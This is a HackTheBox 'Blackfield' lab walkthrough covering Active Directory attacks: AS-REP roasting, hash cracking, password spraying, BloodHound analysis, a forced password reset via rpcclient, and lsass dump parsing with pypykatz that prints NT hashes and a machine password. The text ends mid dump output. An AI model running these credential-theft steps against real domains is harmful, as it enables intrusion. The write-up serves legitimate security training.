HTB - Blackfield

HTB – Blackfield

In this walk through, we will be going through the Blackfield room from HackTheBox. This room is rated as Hard on the platform and it consists of exploitation of Windows and Active Directory misconfigurations to get initial access. For privilge escalation, Backup Operators group privilege was abused to get SYSTEM. So, let’s get started without any delay.

Blackfield

Machine Info:

TitleBlackfield
IPaddress10.10.10.192
DifficultyHard
OSWindows
DescriptionBackfield is a hard difficulty Windows machine featuring Windows and Active Directory misconfigurations.

Enumeration:

  • I started with my regular aggressive nmap scan and found multiple ports opened. The highlights were – port 88 (Kerberos) indicating that we are dealing with an Active Directory environment here. Along with that, port 139 and 445 (SMB) and 389 (LDAP).

$ sudo nmap -A 10.10.10.192
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2023-12-14 11:11 IST

Nmap scan report for 10.10.10.192
Host is up (0.21s latency).
Not shown: 993 filtered ports
PORT     STATE SERVICE       VERSION
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-12-14 12:41:41Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 6h59m59s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2023-12-14T12:42:01
|_  start_date: N/A

TRACEROUTE (using port 135/tcp)
HOP RTT       ADDRESS
1   207.26 ms 10.10.14.1
2   208.09 ms 10.10.10.192

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 94.83 seconds

nmap scan

  • As per the nmap results, found out the domain name is – BLACKFIELD.local. So, added it in my /etc/hosts file.

adding hostname

  • Tried to enumerate some usernames using RCP and LDAP services however found no luck.

RPC and LDAP user enumeration

smbclient -L 10.10.10.192

  • Next, pivoted to SMB enumeration and found an interesting share – profile$

SMB Enumeration

  • Peeked inside the profile share and found a number of potential usernames. Saved it to my local machine in a file called usernames.txt

$ smbclient //10.10.10.192/profiles$
Password for [WORKGROUP\wh1terose]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jun  3 22:17:12 2020
  ..                                  D        0  Wed Jun  3 22:17:12 2020
  AAlleni                             D        0  Wed Jun  3 22:17:11 2020
  ABarteski                           D        0  Wed Jun  3 22:17:11 2020
  ABekesz                             D        0  Wed Jun  3 22:17:11 2020
  ABenzies                            D        0  Wed Jun  3 22:17:11 2020
  ABiemiller                          D        0  Wed Jun  3 22:17:11 2020
  AChampken                           D        0  Wed Jun  3 22:17:11 2020
  ACheretei                           D        0  Wed Jun  3 22:17:11 2020
  ACsonaki                            D        0  Wed Jun  3 22:17:11 2020

-- snipped -- 

Enumerating profile share

$ cat usernames.txt 
AAlleni
ABarteski
ABekesz
ABenzies
ABiemiller
AChampken
ACheretei
ACsonaki
AHigchens
AJaquemai
AKlado
AKoffenburger
AKollolli
AKruppe
AKubale
ALamerz

 --- snipped --

usernames

Performing AS-REProasting attack

  • With our captured usernames, i tried to perform AS-REP roasting on them to check if we can get a TGT for one of the accounts which has Kerberos Pre-Authentication disabled. Got a hit for – support.

python3 ~/Tools/impacket/examples/GetNPUsers.py -no-pass -usersfile usernames.txt -dc-ip 10.10.10.192 'BLACKFIELD.LOCAL/'

Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

-- snipped --

[email protected]:4a9e0763e700c5be596a5dd120f6962c$709b4e186f3a9b346052cc0f14286ba73dfc155327e9cea337bdcd0ef47f1fd54b13578d868209a171fc76c29220607db8182bbfdd1c479291578a21cc1ccf556f3f79c0cae6ce1951f765af242649261a87bf262e6b3e56ccc40e35a15f980d2469e968429c51a54e616d37e9fea4ed0430b38cb5e5c16c82151876029a816cdff290a0204f5348ce7c47dd6e3eeefead7839ed7cdd2f713bc56b1e086069e0475b7cb885582331c48e275c4a16145382a014306221f39dcf60ac071318ce6280452bf628288395f339d6c983469177547227464a44a9816ce4851310123453dde56b9c1e0aeeb8db9530586cad4614a6f5fca8


-- snipped --

ASREProasing attack

  • Cracked the captured hash using hashcat and found the password for the user – #00^BlackKnight.

hashcat -m 18200 hash.txt rockyou.txt -O

cracked password

  • Next, i sprayed the password onto the domain to check if it is valid and got a green flag in crackmapexec output.

crackmapexec smb 10.10.10.192 -u support -p '#00^BlackKnight'

crackmapexec creds spray

  • Tried to get a shell using WinRM however was unable to to so.

unable to get shell

  • I also tried to perform a password spray with the found password on the usernames in the usernames.txt. Got a hit for AAlleni but still wasn’t able to get a shell with that.

crackmapexec smb 10.10.10.192 -u usernames.txt -p '#00^BlackKnight'

crackmapexec password spray

  • Next, checked the SMB shares accessible to user support. I have got an interesting one there called Forensic but we do not have permissions to access it yet.

smbmap -H 10.10.10.192 -u support -p '#00^BlackKnight'
[+] Finding open SMB ports....
[+] User SMB session established on 10.10.10.192...
[+] IP: 10.10.10.192:445	Name: BLACKFIELD.local                                  
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	forensic                                          	NO ACCESS	Forensic / Audit share.

-- snipped -- 

SMB enum with creds

  • I also added the DC01.blackfield.local to my /etc/hosts file in order to avoid any host resolution issues later.

adding DC name

Enumeration with Bloodhound.py

  • I got bumped into a dead end for a while here. Next, i tried using Bloodhound.py script with the creds we have and queried the DC via LDAP to gather some information out of it.

$ bloodhound-python -c all -u support -p '#00^BlackKnight' -d blackfield.local -gc blackfield.local -dc DC01.blackfield.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: DC01.blackfield.local
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 18 computers
INFO: Connecting to LDAP server: DC01.blackfield.local
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 316 users
INFO: Found 52 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts

-- snipped -- 

bloodhound python output

  • Got a bunch of json files containing the queried information.

captured json files

  • Uploaded the files to Bloodhound and performed the analysis. When i looked into the permissions and access the user support has, i found an interesting permission set – First Degree Object Control. With this permissions, i am able to change password for user Audit2020 and thus get access to the concerned account.

Analysis in Bloodhound

Outbound Object Control

ForceChangePassword Privilege

Exploiting First Degree Object Control

  • Next, i used rpcclient to change the password of user audit2020 and checked the changes by spraying it on to the DC using crackmapexec. Found a positive result for it that means we are good to go.

$ rpcclient -U 'blackfield.local/support%#00^BlackKnight' 10.10.10.192
rpcclient $> setuserinfo2 audit2020 23 Password123
rpcclient $> exit

RPCclient password change

crackmapexec creds spary

  • Now i checked the shares for user audit2020 and was able to read the contents of the Forensic share.

$ smbmap -H 10.10.10.192 -u audit2020 -p 'Password123'
[+] Finding open SMB ports....
[+] User SMB session established on 10.10.10.192...
[+] IP: 10.10.10.192:445	Name: blackfield.local                                  
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	.                                                  
	dr--r--r--                0 Sun Feb 23 20:40:16 2020	.
	dr--r--r--                0 Sun Feb 23 20:40:16 2020	..
	dr--r--r--                0 Sun Feb 23 23:44:37 2020	commands_output
	dr--r--r--                0 Fri May 29 01:59:24 2020	memory_analysis
	dr--r--r--                0 Sat Feb 29 04:00:34 2020	tools
	forensic                                          	READ ONLY	Forensic / Audit share.

SMB enum with new creds

  • Accessed the share using smbclient and found bunch of files that contains some tools. Downloaded the files that look interesting on to my local system.

$ smbclient //10.10.10.192/Forensic / Audit share --user audit2020 --password 'Password123'
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Feb 23 18:33:16 2020
  ..                                  D        0  Sun Feb 23 18:33:16 2020
  commands_output                     D        0  Sun Feb 23 23:44:37 2020
  memory_analysis                     D        0  Fri May 29 01:58:33 2020
  tools                               D        0  Sun Feb 23 19:09:08 2020

		5102079 blocks of size 4096. 1691114 blocks available
smb: \> cd commands_ouput
cd \commands_ouput\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \> cd commands_output
smb: \commands_output\> ls
  .                                   D        0  Sun Feb 23 23:44:37 2020
  ..                                  D        0  Sun Feb 23 23:44:37 2020
  domain_admins.txt                   A      528  Sun Feb 23 18:30:19 2020
  domain_groups.txt                   A      962  Sun Feb 23 18:21:52 2020
  domain_users.txt                    A    16454  Sat Feb 29 04:02:17 2020
  firewall_rules.txt                  A   518202  Sun Feb 23 18:23:58 2020
  ipconfig.txt                        A     1782  Sun Feb 23 18:20:28 2020
  netstat.txt                         A     3842  Sun Feb 23 18:21:01 2020
  route.txt                           A     3976  Sun Feb 23 18:23:01 2020
  systeminfo.txt                      A     4550  Sun Feb 23 18:26:59 2020
  tasklist.txt                        A     9990  Sun Feb 23 18:24:29 2020

		5102079 blocks of size 4096. 1691114 blocks available
smb: \commands_output\> cd ..
smb: \> cd memory_analysis
smb: \memory_analysis\> ls
  .                                   D        0  Fri May 29 01:58:33 2020
  ..                                  D        0  Fri May 29 01:58:33 2020
  conhost.zip                         A 37876530  Fri May 29 01:55:36 2020
  ctfmon.zip                          A 24962333  Fri May 29 01:55:45 2020
  dfsrs.zip                           A 23993305  Fri May 29 01:55:54 2020
  dllhost.zip                         A 18366396  Fri May 29 01:56:04 2020
  ismserv.zip                         A  8810157  Fri May 29 01:56:13 2020
  lsass.zip                           A 41936098  Fri May 29 01:55:08 2020
  mmc.zip                             A 64288607  Fri May 29 01:55:25 2020
  RuntimeBroker.zip                   A 13332174  Fri May 29 01:56:24 2020
  ServerManager.zip                   A 131983313  Fri May 29 01:56:49 2020
  sihost.zip                          A 33141744  Fri May 29 01:57:00 2020
  smartscreen.zip                     A 33756344  Fri May 29 01:57:11 2020
  svchost.zip                         A 14408833  Fri May 29 01:57:19 2020
  taskhostw.zip                       A 34631412  Fri May 29 01:57:30 2020
  winlogon.zip                        A 14255089  Fri May 29 01:57:38 2020
  wlms.zip                            A  4067425  Fri May 29 01:57:44 2020
  WmiPrvSE.zip                        A 18303252  Fri May 29 01:57:53 2020

		5102079 blocks of size 4096. 1691114 blocks available
smb: \memory_analysis\> cd ..
smb: \> cd tools
smb: \tools\> ls
  .                                   D        0  Sun Feb 23 19:09:08 2020
  ..                                  D        0  Sun Feb 23 19:09:08 2020
  sleuthkit-4.8.0-win32               D        0  Sun Feb 23 19:09:03 2020
  sysinternals                        D        0  Sun Feb 23 19:05:25 2020
  volatility                          D        0  Sun Feb 23 19:05:39 2020

		5102079 blocks of size 4096. 1691114 blocks available

Accessing forensics share

tools found

smb: \commands_output\> prompt off
smb: \commands_output\> recurse on
smb: \commands_output\> mget *
getting file \commands_output\domain_admins.txt of size 528 as domain_admins.txt (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec)
getting file \commands_output\domain_groups.txt of size 962 as domain_groups.txt (1.1 KiloBytes/sec) (average 0.9 KiloBytes/sec)
getting file \commands_output\domain_users.txt of size 16454 as domain_users.txt (18.9 KiloBytes/sec) (average 6.9 KiloBytes/sec)
getting file \commands_output\firewall_rules.txt of size 518202 as firewall_rules.txt (292.3 KiloBytes/sec) (average 122.5 KiloBytes/sec)
getting file \commands_output\ipconfig.txt of size 1782 as ipconfig.txt (2.1 KiloBytes/sec) (average 102.7 KiloBytes/sec)
getting file \commands_output\netstat.txt of size 3842 as netstat.txt (4.4 KiloBytes/sec) (average 88.8 KiloBytes/sec)
getting file \commands_output\route.txt of size 3976 as route.txt (4.5 KiloBytes/sec) (average 78.1 KiloBytes/sec)
getting file \commands_output\systeminfo.txt of size 4550 as systeminfo.txt (5.3 KiloBytes/sec) (average 70.2 KiloBytes/sec)
getting file \commands_output\tasklist.txt of size 9990 as tasklist.txt (11.4 KiloBytes/sec) (average 64.3 KiloBytes/sec)

downloading everything

downloading everything

  • Looked into one of the files which looked interesting – domain_admins.txt and found out that the a user Ipwn3dYourCompany is also an a Domain Admin.

domain_admins.txt

  • Next interesting file i found was lsass.zip file. This caught my eye because the lsass process holds some credentials in it in the Windows realm. So we might get lucky with this too. After unzipping the file, found a file named called lsass.DMP which is a dump file for the lsass process.

unzip lsass.zip

unzip lsass.zip

  • Used the pypykatz tool to retrieve information from the dump and found some interesting information along with the NTLM hash of user svc_backup and Administrator.

$ pypykatz lsa minidump lsass.DMP 
INFO:pypykatz:Parsing file lsass.DMP
FILE: ======== lsass.DMP =======
== LogonSession ==
authentication_id 406458 (633ba)
session_id 2
username svc_backup
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T18:00:03.423728+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406458
	== MSV ==
		Username: svc_backup
		Domain: BLACKFIELD
		LM: NA
		NT: 9658d1d1dcd9250115e2205d9f48400d
		SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
		DPAPI: a03cd8e9d30171f3cfe8caad92fef621
	== WDIGEST [633ba]==
		username svc_backup
		domainname BLACKFIELD
		password None
		password (hex)
	== Kerberos ==
		Username: svc_backup
		Domain: BLACKFIELD.LOCAL
	== WDIGEST [633ba]==
		username svc_backup
		domainname BLACKFIELD
		password None
		password (hex)

== LogonSession ==
authentication_id 365835 (5950b)
session_id 2
username UMFD-2
domainname Font Driver Host
logon_server 
logon_time 2020-02-23T17:59:38.218491+00:00
sid S-1-5-96-0-2
luid 365835
	== MSV ==
		Username: DC01$
		Domain: BLACKFIELD
		LM: NA
		NT: b624dc83a27cc29da11d9bf25efea796
		SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
		DPAPI: NA
	== WDIGEST [5950b]==
		username DC01$
		domainname BLACKFIELD
		password None
		password (hex)
	== Kerberos ==
		Username: DC01$
		Domain: BLACKFIELD.local
		Password: &SYVE+<ynu`Ql;gvEE!f$DoO0F+,gP@P`fra`z4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En kh`b'YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6
		password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d0048003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600
	== WDIGEST [5950b]==
		username DC01$
		domainname BLACKFIELD
		password None
		password (hex)

== LogonSession ==
authentication_id 365493 (593b5)
session_id 2
username UMFD-2
domainname Font Driver Host
logon_server 
logon_time 2020-02-23T17:59:38.200147+00:00
sid S-1-5-96-0-2
luid 365493
	== MSV ==
		Username: DC01$
		Domain: BLACKFIELD
		LM: NA
		NT: b624dc83a27cc29da11d9bf25efea796
		SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
		DPAPI: NA
	== WDIGEST [593b5]==
		username DC01$
		domainname BLACKFIELD
		password None
		password (hex)
	== Kerberos ==
		Username: DC01$
		Domain: BLACKFIELD.local
		Password: &SYVE+<ynu`Ql;gvEE!f$DoO0F+,gP@P`fra`z4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En kh`b'YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6
		password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d0048003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600
	== WDIGEST [593b5]==
		username DC01$
		domainname BLACKFIELD
		password None
		password (hex)

== LogonSession ==
authentication_id 257142 (3ec76)
session_id 0
username DC01$
domainname BLACKFIELD
logon_server 
logon_time 2020-02-23T17:59:13.318909+00:00
sid S-1-5-18
luid 257142
	== Kerberos ==
		Username: DC01$
		Domain: BLACKFIELD.LOCAL

== LogonSession ==
authentication_id 153705 (25869)
session_id 1
username Administrator
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T17:59:04.506080+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-500
luid 153705
	== MSV ==
		Username: Administrator
		Domain: BLACKFIELD
		LM: NA
		NT: 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
		SHA1: db5c89a961644f0978b4b69a4d2a2239d7886368
		DPAPI: 240339f898b6ac4ce3f34702e4a89550
	== WDIGEST [25869]==
		username Administrator
		domainname BLACKFIELD
		password None
		password (hex)
	== Kerberos ==
		Username: Administrator
		Domain: BLACKFIELD.LOCAL
	== WDIGEST [25869]==
		username Administrator
		domainname BLACKFIELD
		password None
		password (hex)
	== DPAPI [25869]==
		luid 153705
		key_guid d1f69692-cfdc-4a80-959e-bab79c9c327e
		masterkey 769c45bf7ceb3c0e28fb78f2e355f7072873930b3c1d3aef0e04ecbb3eaf16aa946e553007259bf307eb740f222decadd996ed660ffe648b0440d84cd97bf5a5
		sha1_masterkey d04452f8459a46460939ced67b971bcf27cb2fb9

== LogonSession ==
authentication_id 137110 (21796)
session_id 0
username DC01$
domainname BLACKFIELD
logon_server 
logon_time 2020-02-23T17:58:27.068590+00:00
sid S-1-5-18
luid 137110
	== Kerberos ==
		Username: DC01$
		Domain: BLACKFIELD.LOCAL

== LogonSession ==
authentication_id 134695 (20e27)
session_id 0
username DC01$
domainname BLACKFIELD
logon_server 
logon_time 2020-02-23T17:58:26.678019+00:00
sid S-1-5-18
luid 134695
	== Kerberos ==
		Username: DC01$
		Domain: BLACKFIELD.LOCAL

== LogonSession ==
authentication_id 40310 (9d76)
session_id 1
username DWM-1
domainname Window Manager
logon_server 
logon_time 2020-02-23T17:57:46.897202+00:00
sid S-1-5-90-0-1
luid 40310
	== MSV ==
		Username: DC01$
		Domain: BLACKFIELD
		LM: NA
		NT: b624dc83a27cc29da11d9bf25efea796
		SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
		DPAPI: NA
	== WDIGEST [9d76]==
		username DC01$
		domainname BLACKFIELD
		password None
		password (hex)
	== Kerberos ==
		Username: DC01$
		Domain: BLACKFIELD.local
		Password: &SYVE+<ynu`Ql;gvEE!f$DoO0F+,gP@P`fra`z4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En kh`b'YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6
		password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d0048003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600
	== WDIGEST [9d76]==
		username DC01$
		domainname BLACKFIELD
		password None
		password (hex)

== LogonSession ==
authentication_id 40232 (9d28)
session_id 1
username DWM-1
domainname Window Manager
logon_server 
logon_time 2020-02-23T17:57:46.897202+00:00
sid S-1-5-90-0-1
luid 40232
	== MSV ==
		Username: DC01$
		Domain: BLACKFIELD
		LM: NA
		NT: b624dc83a27cc29da11d9bf25efea796
		SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
		DPAPI: NA
	== WDIGEST [9d28]==
		username DC01$
		domainname BLACKFIELD
		password None
		password (hex)
	== Kerberos ==
		Username: DC01$
		Domain: BLACKFIELD.local
		Password: &SYVE+<ynu`Ql;gvEE!f$DoO0F+,gP@P`fra`z4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En kh`b'YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6
		password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d0048003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600
	== WDIGEST [9d28]==
		username DC01$
		domainname BLACKFIELD
		password None
		password (hex)

== LogonSession ==
authentication_id 996 (3e4)
session_id 0
username DC01$
domainname BLACKFIELD
logon_server 
logon_time 2020-02-23T17:57:46.725846+00:00
sid S-1-5-20
luid 996
	== MSV ==
		Username: DC01$
		Domain: BLACKFIELD
		LM: NA
		NT: b624dc83a27cc29da11d9bf25efea796
		SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
		DPAPI: NA
	== WDIGEST [3e4]==
		username DC01$
		domainname BLACKFIELD
		password None
		password (hex)
	== Kerberos ==
		Username: dc01$
		Domain: BLACKFIELD.local
		Password: &SYVE+<ynu`Ql;gvEE!f$DoO0F+,gP@P`fra`z4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En kh`b'YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6
		password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d0048003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600
	== WDIGEST [3e4]==
		username DC01$
		domainname BLACKFIELD
		password None
		password (hex)

== LogonSession ==
authentication_id 24410 (5f5a)
session_id 1
username UMFD-1
domainname Font Driver Host
logon_server 
logon_time 2020-02-23T17:57:46.569111+00:00
sid S-1-5-96-0-1
luid 24410
	== MSV ==
		Username: DC01$
		Domain: BLACKFIELD
		LM: NA
		NT: b624dc83a27cc29da11d9bf25efea796
		SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
		DPAPI: NA
	== WDIGEST [5f5a]==
		username DC01$
		domainname BLACKFIELD
		password None
		password (hex)
	== Kerberos ==
		Username: DC01$
		Domain: BLACKFIELD.local
		Password: &SYVE+<ynu`Ql;gvEE!f$DoO0F+,gP@P`fra`z4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En kh`b'YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6
		password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d0048003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600
	== WDIGEST [5f5a]==
		username DC01$
		domainname BLACKFIELD
		password None
		password (hex)

== LogonSession ==
authentication_id 406499 (633e3)
session_id 2
username svc_backup
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T18:00:03.423728+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406499
	== MSV ==
		Username: svc_backup
		Domain: BLACKFIELD
		LM: NA
		NT: 9658d1d1dcd9250115e2205d9f48400d
		SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
		DPAPI: a03cd8e9d30171f3cfe8caad92fef621
	== WDIGEST [633e3]==
		username svc_backup
		domainname BLACKFIELD
		password None
		password (hex)
	== Kerberos ==
		Username: svc_backup
		Domain: BLACKFIELD.LOCAL
	== WDIGEST [633e3]==
		username svc_backup
		domainname BLACKFIELD
		password None
		password (hex)
	== DPAPI [633e3]==
		luid 406499
		key_guid 836e8326-d136-4b9f-94c7-3353c4e45770
		masterkey 0ab34d5f8cb6ae5ec44a4cb49ff60c8afdf0b465deb9436eebc2fcb1999d5841496c3ffe892b0a6fed6742b1e13a5aab322b6ea50effab71514f3dbeac025bdf
		sha1_masterkey 6efc8aa0abb1f2c19e101fbd9bebfb0979c4a991

== LogonSession ==
authentication_id 366665 (59849)
session_id 2
username DWM-2
domainname Window Manager
logon_server 
logon_time 2020-02-23T17:59:38.293877+00:00
sid S-1-5-90-0-2
luid 366665
	== MSV ==
		Username: DC01$
		Domain: BLACKFIELD
		LM: NA
		NT: b624dc83a27cc29da11d9bf25efea796
		SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
		DPAPI: NA
	== WDIGEST [59849]==
		username DC01$
		domainname BLACKFIELD
		password None
		password (hex)
	== Kerberos ==
		Username: DC01$
		Domain: BLACKFIELD.local
		Password: &SYVE+<ynu`Ql;gvEE!f$DoO0F+,gP@P`fra`z4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En kh`b'YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6
		password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d0048003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600
	== WDIGEST [59849]==
		username DC01$
		domainname BLACKFIELD
		password None
		password (hex)

== LogonSession ==
authentication_id 366649 (59839)
session_id 2
username DWM-2
domainname Window Manager
logon_server 
logon_time 2020-02-23T17:59:38.293877+00:00
sid S-1-5-90-0-2
luid 366649
	== MSV ==
		Username: DC01$
		Domain: BLACKFIELD
		LM: NA
		NT: b624dc83a27cc29da11d9bf25efea796
		SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
		DPAPI: NA
	== WDIGEST [59839]==
		username DC01$
		domainname BLACKFIELD
		password None
		password (hex)
	== Kerberos ==
		Username: DC01$
		Domain: BLACKFIELD.local
		Password: &SYVE+<ynu`Ql;gvEE!f$DoO0F+,gP@P`fra`z4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En kh`b'YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6
		password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d0048003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600
	== WDIGEST [59839]==
		username DC01$
		domainname BLACKFIELD
		password None
		password (hex)

== LogonSession ==
authentication_id 256940 (3ebac)
session_id 0
username DC01$
domainname BLACKFIELD
logon_server 
logon_time 2020-02-23T17:59:13.068835+00:00
sid S-1-5-18
luid 256940
	== Kerberos ==
		Username: DC01$
		Domain: BLACKFIELD.LOCAL

== LogonSession ==
authentication_id 136764 (2163c)
session_id 0
username DC01$
domainname BLACKFIELD
logon_server 
logon_time 2020-02-23T17:58:27.052945+00:00
sid S-1-5-18
luid 136764
	== Kerberos ==
		Username: DC01$
		Domain: BLACKFIELD.LOCAL

== LogonSession ==
authentication_id 134935 (20f17)
session_id 0
username DC01$
domainname BLACKFIELD
logon_server 
logon_time 2020-02-23T17:58:26.834285+00:00
sid S-1-5-18
luid 134935
	== Kerberos ==
		Username: DC01$
		Domain: BLACKFIELD.LOCAL

== LogonSession ==
authentication_id 997 (3e5)
session_id 0
username LOCAL SERVICE
domainname NT AUTHORITY
logon_server 
logon_time 2020-02-23T17:57:47.162285+00:00
sid S-1-5-19
luid 997
	== Kerberos ==
		Username: 
		Domain: 

== LogonSession ==
authentication_id 24405 (5f55)
session_id 0
username UMFD-0
domainname Font Driver Host
logon_server 
logon_time 2020-02-23T17:57:46.569111+00:00
sid S-1-5-96-0-0
luid 24405
	== MSV ==
		Username: DC01$
		Domain: BLACKFIELD
		LM: NA
		NT: b624dc83a27cc29da11d9bf25efea796
		SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
		DPAPI: NA
	== WDIGEST [5f55]==
		username DC01$
		domainname BLACKFIELD
		password None
		password (hex)
	== Kerberos ==
		Username: DC01$
		Domain: BLACKFIELD.local
